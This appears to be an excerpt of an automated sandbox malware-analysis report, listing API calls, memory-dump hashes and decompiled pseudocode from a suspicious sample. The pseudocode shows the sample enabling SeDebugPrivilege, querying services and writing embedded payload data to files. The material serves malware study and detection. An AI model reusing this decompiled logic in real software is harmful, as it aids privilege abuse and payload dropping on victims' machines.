                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                                                    • String ID:
                                                                    • API String ID: 337272696-0
                                                                    • Opcode ID: cc6d649f4953b5b98c50b2ae77528d577f7d4befa7bf114f8679803e5dc5c4d5
                                                                    • Instruction ID: 1477a081d7e8a10fc79a1c14c8de24ad393f282769223639313b0ead11e3f174
                                                                    • Opcode Fuzzy Hash: cc6d649f4953b5b98c50b2ae77528d577f7d4befa7bf114f8679803e5dc5c4d5
                                                                    • Instruction Fuzzy Hash: 45415F71E40219BAEB15EBA1ED55FEEBB7EEF50745F100015A901B26C0DBB49E08CF61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 004116AD
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411262
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411274
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411286
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411298
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 004112AA
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 004112BC
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 004112CE
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 004112E0
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 004112F2
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411304
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411316
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411328
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 0041133A
                                                                    • _free.LIBCMT ref: 004116A2
                                                                      • Part of subcall function 0040DD40: HeapFree.KERNEL32(00000000,00000000,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?), ref: 0040DD56
                                                                      • Part of subcall function 0040DD40: GetLastError.KERNEL32(?,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?,?), ref: 0040DD68
                                                                    • _free.LIBCMT ref: 004116C4
                                                                    • _free.LIBCMT ref: 004116D9
                                                                    • _free.LIBCMT ref: 004116E4
                                                                    • _free.LIBCMT ref: 00411706
                                                                    • _free.LIBCMT ref: 00411719
                                                                    • _free.LIBCMT ref: 00411727
                                                                    • _free.LIBCMT ref: 00411732
                                                                    • _free.LIBCMT ref: 0041176A
                                                                    • _free.LIBCMT ref: 00411771
                                                                    • _free.LIBCMT ref: 0041178E
                                                                    • _free.LIBCMT ref: 004117A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: a4d3aa18bc232d42e33238a0a82706238f2805589507b0d8f9697b7231289369
                                                                    • Instruction ID: 45ea7b2fa5b796892eefd2f212ff2afbecec9812976f126a4dcde4366d6748c2
                                                                    • Opcode Fuzzy Hash: a4d3aa18bc232d42e33238a0a82706238f2805589507b0d8f9697b7231289369
                                                                    • Instruction Fuzzy Hash: D9315331A006049FDB21AB7AD845BAB73E4EF40314F14452FE659DB2A1DB39EC84CB1C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegCloseKey.ADVAPI32(00000000,2CD7C1E8,?,00000000), ref: 004056EA
                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 0040573A
                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 00405792
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00405815
                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,?,?,?,?), ref: 00405861
                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 0040587B
                                                                    • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,0002001F,00000000,?,?,?,?), ref: 004058C5
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004058D4
                                                                    • RegCloseKey.ADVAPI32(00000000,2CD7C1E8,?,00000000), ref: 00406681
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Close$AddressHandleModuleOpenProc
                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedA
                                                                    • API String ID: 1177782415-496252237
                                                                    • Opcode ID: b4c01026a143687f20e34d0287e17c992046d964f46a17ca0f730238ae0d3326
                                                                    • Instruction ID: 52dea58d6fd1864949a0b74c4eb67e1190943b2b31d3c2c44895b4125e5da2f3
                                                                    • Opcode Fuzzy Hash: b4c01026a143687f20e34d0287e17c992046d964f46a17ca0f730238ae0d3326
                                                                    • Instruction Fuzzy Hash: 67C12DB1A016299FDB219F14CC40B9AB7B5EB48314F4041FAEA09B7381DB399E94CF5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000104), ref: 00403633
                                                                      • Part of subcall function 004039D0: GetLastError.KERNEL32(?,80070057,8007000E,80004005,?,004036AD,00000000,?,00000106,?,?,00000000,00000104), ref: 004039D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastModuleName
                                                                    • String ID: InprocServer32$LocalServer32$MODULEGUID$MODULETYPE$Module$Module_Raw
                                                                    • API String ID: 2776309574-664224703
                                                                    • Opcode ID: a8418159842711f7d06213fe0230953b7beead7843f29a8dea78e184c4005e27
                                                                    • Instruction ID: 7a119ec535a6d13420535af0fb9d5bc46c472d27a6ba2ac0ee5c9fcfc197c1b0
                                                                    • Opcode Fuzzy Hash: a8418159842711f7d06213fe0230953b7beead7843f29a8dea78e184c4005e27
                                                                    • Instruction Fuzzy Hash: BF61C8B1B44215ABD7219F60CC85FEA77ACAB04705F1041BFF905B72C1EBB8EB448A59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1D58D(struct _QUERY_SERVICE_CONFIG* _a4) {
                                                                    				int _v8;
                                                                    				void* __ecx;
                                                                    				void* _t10;
                                                                    				void* _t26;
                                                                    				struct _QUERY_SERVICE_CONFIG* _t34;
                                                                    				void* _t37;
                                                                    
                                                                    				_v8 = 0;
                                                                    				_t10 = OpenSCManagerW(0, L"ServicesActive", 1); /* dwDesiredAccess 1 = SC_MANAGER_CONNECT */
                                                                    				_t37 = _t10;
                                                                    				if(_t37 != 0) {
                                                                    					_t26 = OpenServiceW(_t37,  *_a4, 1); /* *_a4 is the service name; dwDesiredAccess 1 = SERVICE_QUERY_CONFIG */
                                                                    					if(_t26 != 0) {
                                                                    						/* first call with a NULL buffer only obtains the required size; 0x7a = ERROR_INSUFFICIENT_BUFFER */
                                                                    						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
                                                                    							_t34 = E02D15EFF(_v8); /* allocates _v8 bytes for the QUERY_SERVICE_CONFIGW structure */
                                                                    							_a4 = _t34;
                                                                    							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
                                                                    								CloseServiceHandle(_t37);
                                                                    								CloseServiceHandle(_t26);
                                                                    								E02D11099(_a4); /* releases the buffer (HeapFree, see subcall below) */
                                                                    								_t10 =  *(_t34 + 4); /* offset 4 of QUERY_SERVICE_CONFIGW = dwStartType; the listing reads it after the buffer was released */
                                                                    							} else {
                                                                    								goto L6;
                                                                    							}
                                                                    						} else {
                                                                    							L6:
                                                                    							CloseServiceHandle(_t37);
                                                                    							CloseServiceHandle(_t26);
                                                                    							goto L7;
                                                                    						}
                                                                    					} else {
                                                                    						CloseServiceHandle(_t37);
                                                                    						L7:
                                                                    						_t10 = 0;
                                                                    					}
                                                                    				}
                                                                    				return _t10;
                                                                    			}

                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 02D1D5A0
                                                                    • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 02D1D5B9
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D5C6
                                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 02D1D5D5
                                                                    • GetLastError.KERNEL32 ref: 02D1D5DF
                                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 02D1D600
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D611
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D614
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D624
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D627
                                                                      • Part of subcall function 02D11099: GetProcessHeap.KERNEL32(00000000,00000000,02D21E18,00000000,00000000,00000000,00000000,.bss,00000000), ref: 02D1109F
                                                                      • Part of subcall function 02D11099: HeapFree.KERNEL32(00000000), ref: 02D110A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                                                    • String ID: ServicesActive
                                                                    • API String ID: 1929760286-3071072050
                                                                    • Opcode ID: c8c2bd7463793eaa30298322c88bbe25cc085dece5a83e0691bea9c9a61352c9
                                                                    • Instruction ID: 06b6a657383812eb5f0dfeb4ab9d4e54aed44ab8deef31b28c2ae87a2c4748b9
                                                                    • Opcode Fuzzy Hash: c8c2bd7463793eaa30298322c88bbe25cc085dece5a83e0691bea9c9a61352c9
                                                                    • Instruction Fuzzy Hash: F0117971940258BBDB209B62EE48E9F7BAEEB95350B210425F90A93300DB309E44CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 84%
                                                                    			E02D1DED2(struct _CRITICAL_SECTION* __ecx, void* __edx) {
                                                                    				char _v28;
                                                                    				char _v32;
                                                                    				char _v36;
                                                                    				char _v52;
                                                                    				char _v60;
                                                                    				char _v68;
                                                                    				char _v76;
                                                                    				signed int _v80;
                                                                    				char _v84;
                                                                    				char _v88;
                                                                    				char _v92;
                                                                    				signed int _v96;
                                                                    				signed int _v100;
                                                                    				intOrPtr _v104;
                                                                    				char _v108;
                                                                    				signed int _v112;
                                                                    				signed int _v116;
                                                                    				int _t102;
                                                                    				int _t103;
                                                                    				int _t106;
                                                                    				int _t107;
                                                                    				void* _t109;
                                                                    				void* _t110;
                                                                    				int _t111;
                                                                    				int _t113;
                                                                    				int _t114;
                                                                    				int _t120;
                                                                    				void* _t121;
                                                                    				int _t159;
                                                                    				void* _t172;
                                                                    				int _t181;
                                                                    				int _t182;
                                                                    				signed int _t203;
                                                                    				char* _t233;
                                                                    				intOrPtr _t244;
                                                                    				void* _t248;
                                                                    				char* _t251;
                                                                    				void* _t264;
                                                                    				struct _CRITICAL_SECTION* _t267;
                                                                    				signed int _t276;
                                                                    				signed int _t278;
                                                                    				signed int _t279;
                                                                    				void* _t281;
                                                                    
                                                                    				_t264 = __edx;
                                                                    				_t205 = __ecx;
                                                                    				_t281 = (_t279 & 0xfffffff8) - 0x5c;
                                                                    				_t267 = __ecx;
                                                                    				_t203 = 0;
                                                                    				_v84 = 0;
                                                                    				_v80 = 0;
                                                                    				_v96 = 0;
                                                                    				EnterCriticalSection(__ecx);
                                                                    				if(E02D1FC58(_t205) == 1) {
                                                                    					_t205 =  &_v96;
                                                                    					E02D1F7E0( &_v96);
                                                                    				}
                                                                    				_t270 = _t267 + 0x38;
                                                                    				_t102 = PathFileExistsW( *(_t267 + 0x38));
                                                                    				_t283 = _t102;
                                                                    				if(_t102 != 0) {
                                                                    					L14:
                                                                    					_t271 = _t267 + 0x3c;
                                                                    					_t103 = PathFileExistsW( *(_t267 + 0x3c));
                                                                    					__eflags = _t103;
                                                                    					if(_t103 != 0) {
                                                                    						L20:
                                                                    						E02D1DCB2(_t267, _t264);
                                                                    						E02D1DC99(_t267);
                                                                    						_t208 = _t267;
                                                                    						_t106 = E02D1DA5B(_t267);
                                                                    						__eflags = _t106;
                                                                    						if(_t106 != 0) {
                                                                    							_t209 = _t267;
                                                                    							_t107 = E02D1D9B6(_t267, _t264, _t208);
                                                                    							__eflags = _t107;
                                                                    							if(_t107 != 0) {
                                                                    								E02D1DC36(_t209);
                                                                    								_t109 = E02D135E5( &_v92, L"SeDebugPrivilege");
                                                                    								_t110 = GetCurrentProcess();
                                                                    								_t265 = _t109;
                                                                    								_t111 = E02D1F619(_t110, _t109);
                                                                    								E02D15EA5(_v96);
                                                                    								__eflags = _t111;
                                                                    								if(_t111 != 0) {
                                                                    									_t213 =  *(_t267 + 0x2c);
                                                                    									_t113 = E02D20CF6( *(_t267 + 0x2c));
                                                                    									__eflags = _t113;
                                                                    									if(_t113 != 0) {
                                                                    										Sleep(0x3e8);
                                                                    										_t114 =  *(_t267 + 0x4c);
                                                                    										__eflags = _t114;
                                                                    										if(_t114 != 0) {
                                                                    											_t276 = _t203;
                                                                    											__eflags = _t276 - _t114;
                                                                    											do {
                                                                    												E02D15CA3(_t213 & 0xffffff00 | __eflags > 0x00000000);
                                                                    												E02D1362D( &_v92,  *((intOrPtr*)(_t267 + 0x44)) + _t276 * 4);
                                                                    												E02D1D508( &_v96);
                                                                    												_t213 = _v100;
                                                                    												E02D15EA5(_v100);
                                                                    												_t276 = _t276 + 1;
                                                                    												_v100 = _t203;
                                                                    												__eflags = _t276 -  *(_t267 + 0x4c);
                                                                    											} while (_t276 <  *(_t267 + 0x4c));
                                                                    										}
                                                                    										Sleep(0x1f4);
                                                                    										E02D1362D( &_v92, _t267 + 0x28);
                                                                    										E02D1D508( &_v96);
                                                                    										_t215 = _v100;
                                                                    										E02D15EA5(_v100);
                                                                    										Sleep(0x1f4);
                                                                    										_t120 = E02D1D63B(_t265, __eflags, _v100);
                                                                    										__eflags = _t120;
                                                                    										if(_t120 != 0) {
                                                                    											_t121 = E02D1FC58(_t215);
                                                                    											__eflags = _t121 - 1;
                                                                    											if(_t121 == 1) {
                                                                    												E02D1F7B9(_v96);
                                                                    											}
                                                                    											E02D14F2B( *((intOrPtr*)(_t267 + 0x64)), E02D14B91( &_v68, _t203, _t267 + 0x5c, _t267 + 0x60));
                                                                    											E02D14B6E( &_v84);
                                                                    											LeaveCriticalSection(_t267);
                                                                    											_t203 = 8;
                                                                    										} else {
                                                                    											_push(_t267 + 0x60);
                                                                    											_push(_t267 + 0x5c);
                                                                    											_push(7);
                                                                    											goto L34;
                                                                    										}
                                                                    									} else {
                                                                    										E02D1F7B9(_v96);
                                                                    										_push(_t267 + 0x60);
                                                                    										_push(_t267 + 0x5c);
                                                                    										_push(5);
                                                                    										goto L34;
                                                                    									}
                                                                    								} else {
                                                                    									E02D1F7B9(_v96);
                                                                    									_push(_t267 + 0x60);
                                                                    									_push(_t267 + 0x5c);
                                                                    									_push(3);
                                                                    									goto L34;
                                                                    								}
                                                                    							} else {
                                                                    								E02D1F7B9(_v96);
                                                                    								_push(_t267 + 0x60);
                                                                    								_push(_t267 + 0x5c);
                                                                    								_push(6);
                                                                    								goto L34;
                                                                    							}
                                                                    						} else {
                                                                    							E02D1F7B9(_v96);
                                                                    							_push(_t267 + 0x60);
                                                                    							_push(_t267 + 0x5c);
                                                                    							_push(4);
                                                                    							L34:
                                                                    							E02D14F2B( *((intOrPtr*)(_t267 + 0x64)), E02D14B91( &_v68));
                                                                    							E02D14B6E( &_v84);
                                                                    							LeaveCriticalSection(_t267);
                                                                    						}
                                                                    					} else {
                                                                    						E02D1362D(_t281, _t271);
                                                                    						E02D20203( &_v32, __eflags, _t205, _t203);
                                                                    						_t232 =  *((intOrPtr*)(_t267 + 0x58));
                                                                    						E02D237A8( *((intOrPtr*)(_t267 + 0x58)), _t264,  &_v88,  *((intOrPtr*)(_t267 + 0x64)), 3);
                                                                    						__eflags = _v100 - _t203;
                                                                    						if(_v100 != _t203) {
                                                                    							_t233 =  &_v28;
                                                                    							_t159 = E02D1FDF0(_t233, _t232, _t232);
                                                                    							__eflags = _t159;
                                                                    							if(_t159 != 0) {
                                                                    								_push(_t233);
                                                                    								E02D2013D( &_v28,  &_v76);
                                                                    								E02D20125( &_v36);
                                                                    							}
                                                                    							E02D13036( &_v76);
                                                                    							E02D1FEED( &_v28, __eflags);
                                                                    							goto L20;
                                                                    						} else {
                                                                    							E02D13036( &_v76);
                                                                    							goto L8;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					E02D1362D(_t281, _t270);
                                                                    					E02D20203( &_v32, _t283, _t205, _t203);
                                                                    					E02D1362D(_t281, _t267 + 0x40);
                                                                    					E02D20203( &_v68, _t283,  &_v32, _t203);
                                                                    					_v116 = _t203;
                                                                    					_v112 = _t203;
                                                                    					_v100 = _t203;
                                                                    					_v96 = _t203;
                                                                    					_t172 = E02D1FC58( &_v68);
                                                                    					_t244 =  *((intOrPtr*)(_t267 + 0x58));
                                                                    					if(_t172 != 1) {
                                                                    						E02D12E93( &_v96, E02D237A8(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 1));
                                                                    						E02D13036( &_v84);
                                                                    						_t278 = _v100;
                                                                    						E02D12F91( &_v108, _t278, 0x12e00);
                                                                    						_t248 = _t278 + 0x12e00;
                                                                    						_t179 = _v104 + 0xfffed200;
                                                                    						__eflags = _v104 + 0xfffed200;
                                                                    					} else {
                                                                    						E02D12E93( &_v96, E02D237A8(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 2));
                                                                    						E02D13036( &_v84);
                                                                    						_t278 = _v100;
                                                                    						E02D12F91( &_v108, _t278, 0x1c800);
                                                                    						_t248 = _t278 + 0x1c800;
                                                                    						_t179 = _v104 + 0xfffe3800;
                                                                    					}
                                                                    					E02D12F91( &_v76, _t248, _t179);
                                                                    					_t285 = _t278;
                                                                    					if(_t278 != 0) {
                                                                    						_t250 =  &_v28;
                                                                    						_t181 = E02D1FDF0(_t250,  &_v76,  &_v76);
                                                                    						__eflags = _t181;
                                                                    						if(_t181 != 0) {
                                                                    							_push(_t250);
                                                                    							E02D2013D( &_v28,  &_v92);
                                                                    							_t250 =  &_v36;
                                                                    							E02D20125( &_v36);
                                                                    						}
                                                                    						_t251 =  &_v52;
                                                                    						_t182 = E02D1FDF0(_t251, _t250, _t250);
                                                                    						__eflags = _t182;
                                                                    						if(_t182 != 0) {
                                                                    							_push(_t251);
                                                                    							E02D2013D( &_v52,  &_v76);
                                                                    							E02D20125( &_v60);
                                                                    						}
                                                                    						E02D13036( &_v76);
                                                                    						E02D13036( &_v92);
                                                                    						E02D1FEED( &_v52, __eflags);
                                                                    						_t205 =  &_v28;
                                                                    						E02D1FEED( &_v28, __eflags);
                                                                    						goto L14;
                                                                    					} else {
                                                                    						E02D13036( &_v76);
                                                                    						E02D13036( &_v92);
                                                                    						E02D1FEED( &_v52, _t285);
                                                                    						L8:
                                                                    						E02D1FEED( &_v28, _t285);
                                                                    						_t203 = _t203 | 0xffffffff;
                                                                    					}
                                                                    				}
                                                                    				E02D13036( &_v84);
                                                                    				return _t203;
                                                                    			}

                                                                    0x02d1ded2
                                                                    0x02d1ded2
                                                                    0x02d1ded8
                                                                    0x02d1dede
                                                                    0x02d1dee0
                                                                    0x02d1dee3
                                                                    0x02d1dee7
                                                                    0x02d1deeb
                                                                    0x02d1deef
                                                                    0x02d1defd
                                                                    0x02d1deff
                                                                    0x02d1df03
                                                                    0x02d1df03
                                                                    0x02d1df08
                                                                    0x02d1df0d
                                                                    0x02d1df13
                                                                    0x02d1df15
                                                                    0x02d1e094
                                                                    0x02d1e094
                                                                    0x02d1e099
                                                                    0x02d1e09f
                                                                    0x02d1e0a1
                                                                    0x02d1e115
                                                                    0x02d1e117
                                                                    0x02d1e11e
                                                                    0x02d1e123
                                                                    0x02d1e125
                                                                    0x02d1e12a
                                                                    0x02d1e12c
                                                                    0x02d1e147
                                                                    0x02d1e149
                                                                    0x02d1e14e
                                                                    0x02d1e150
                                                                    0x02d1e16a
                                                                    0x02d1e178
                                                                    0x02d1e17f
                                                                    0x02d1e185
                                                                    0x02d1e189
                                                                    0x02d1e194
                                                                    0x02d1e199
                                                                    0x02d1e19b
                                                                    0x02d1e1b5
                                                                    0x02d1e1b8
                                                                    0x02d1e1bd
                                                                    0x02d1e1bf
                                                                    0x02d1e1e4
                                                                    0x02d1e1e6
                                                                    0x02d1e1e9
                                                                    0x02d1e1eb
                                                                    0x02d1e1ed
                                                                    0x02d1e1ef
                                                                    0x02d1e1f1
                                                                    0x02d1e1f4
                                                                    0x02d1e204
                                                                    0x02d1e20e
                                                                    0x02d1e213
                                                                    0x02d1e217
                                                                    0x02d1e21f
                                                                    0x02d1e220
                                                                    0x02d1e224
                                                                    0x02d1e224
                                                                    0x02d1e228
                                                                    0x02d1e233
                                                                    0x02d1e23d
                                                                    0x02d1e247
                                                                    0x02d1e24c
                                                                    0x02d1e250
                                                                    0x02d1e25a
                                                                    0x02d1e25d
                                                                    0x02d1e262
                                                                    0x02d1e264
                                                                    0x02d1e294
                                                                    0x02d1e299
                                                                    0x02d1e29c
                                                                    0x02d1e2a2
                                                                    0x02d1e2a2
                                                                    0x02d1e2bd
                                                                    0x02d1e2c6
                                                                    0x02d1e2cc
                                                                    0x02d1e2d4
                                                                    0x02d1e266
                                                                    0x02d1e269
                                                                    0x02d1e26d
                                                                    0x02d1e26e
                                                                    0x00000000
                                                                    0x02d1e26e
                                                                    0x02d1e1c1
                                                                    0x02d1e1c5
                                                                    0x02d1e1cd
                                                                    0x02d1e1d1
                                                                    0x02d1e1d2
                                                                    0x00000000
                                                                    0x02d1e1d2
                                                                    0x02d1e19d
                                                                    0x02d1e1a1
                                                                    0x02d1e1a9
                                                                    0x02d1e1ad
                                                                    0x02d1e1ae
                                                                    0x00000000
                                                                    0x02d1e1ae
                                                                    0x02d1e152
                                                                    0x02d1e156
                                                                    0x02d1e15e
                                                                    0x02d1e162
                                                                    0x02d1e163
                                                                    0x00000000
                                                                    0x02d1e163
                                                                    0x02d1e12e
                                                                    0x02d1e132
                                                                    0x02d1e13a
                                                                    0x02d1e13e
                                                                    0x02d1e13f
                                                                    0x02d1e270
                                                                    0x02d1e27d
                                                                    0x02d1e286
                                                                    0x02d1e28c
                                                                    0x02d1e28c
                                                                    0x02d1e0a3
                                                                    0x02d1e0a8
                                                                    0x02d1e0b1
                                                                    0x02d1e0b6
                                                                    0x02d1e0c3
                                                                    0x02d1e0c8
                                                                    0x02d1e0cc
                                                                    0x02d1e0de
                                                                    0x02d1e0e2
                                                                    0x02d1e0e7
                                                                    0x02d1e0e9
                                                                    0x02d1e0eb
                                                                    0x02d1e0f5
                                                                    0x02d1e0fe
                                                                    0x02d1e0fe
                                                                    0x02d1e107
                                                                    0x02d1e110
                                                                    0x00000000
                                                                    0x02d1e0ce
                                                                    0x02d1e0d2
                                                                    0x00000000
                                                                    0x02d1e0d2
                                                                    0x02d1e0cc
                                                                    0x02d1df1b
                                                                    0x02d1df20
                                                                    0x02d1df29
                                                                    0x02d1df36
                                                                    0x02d1df3f
                                                                    0x02d1df44
                                                                    0x02d1df48
                                                                    0x02d1df4c
                                                                    0x02d1df50
                                                                    0x02d1df54
                                                                    0x02d1df59
                                                                    0x02d1df63
                                                                    0x02d1dfb7
                                                                    0x02d1dfc0
                                                                    0x02d1dfc5
                                                                    0x02d1dfd3
                                                                    0x02d1dfdc
                                                                    0x02d1dfe2
                                                                    0x02d1dfe2
                                                                    0x02d1df65
                                                                    0x02d1df75
                                                                    0x02d1df7e
                                                                    0x02d1df83
                                                                    0x02d1df91
                                                                    0x02d1df9a
                                                                    0x02d1dfa0
                                                                    0x02d1dfa0
                                                                    0x02d1dfed
                                                                    0x02d1dff2
                                                                    0x02d1dff4
                                                                    0x02d1e024
                                                                    0x02d1e028
                                                                    0x02d1e02d
                                                                    0x02d1e02f
                                                                    0x02d1e031
                                                                    0x02d1e03b
                                                                    0x02d1e040
                                                                    0x02d1e044
                                                                    0x02d1e044
                                                                    0x02d1e04b
                                                                    0x02d1e04f
                                                                    0x02d1e054
                                                                    0x02d1e056
                                                                    0x02d1e058
                                                                    0x02d1e062
                                                                    0x02d1e06b
                                                                    0x02d1e06b
                                                                    0x02d1e074
                                                                    0x02d1e07d
                                                                    0x02d1e086
                                                                    0x02d1e08b
                                                                    0x02d1e08f
                                                                    0x00000000
                                                                    0x02d1dff6
                                                                    0x02d1dffa
                                                                    0x02d1e003
                                                                    0x02d1e00c
                                                                    0x02d1e011
                                                                    0x02d1e015
                                                                    0x02d1e01a
                                                                    0x02d1e01a
                                                                    0x02d1dff4
                                                                    0x02d1e2d9
                                                                    0x02d1e2e6

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32 ref: 02D1DEEF
                                                                      • Part of subcall function 02D1FC58: GetCurrentProcess.KERNEL32(?,?,02D12D84,?,02D24648,?,?,00000000,?,?,?), ref: 02D1FC5C
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 02D1E099
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 02D1DF0D
                                                                      • Part of subcall function 02D1FDF0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000,?,?,?,02D19A69,?,?,?), ref: 02D1FE07
                                                                      • Part of subcall function 02D1FDF0: GetLastError.KERNEL32(?,?,?,02D19A69,?,?,?), ref: 02D1FE15
                                                                    • LeaveCriticalSection.KERNEL32(?,00000000), ref: 02D1E28C
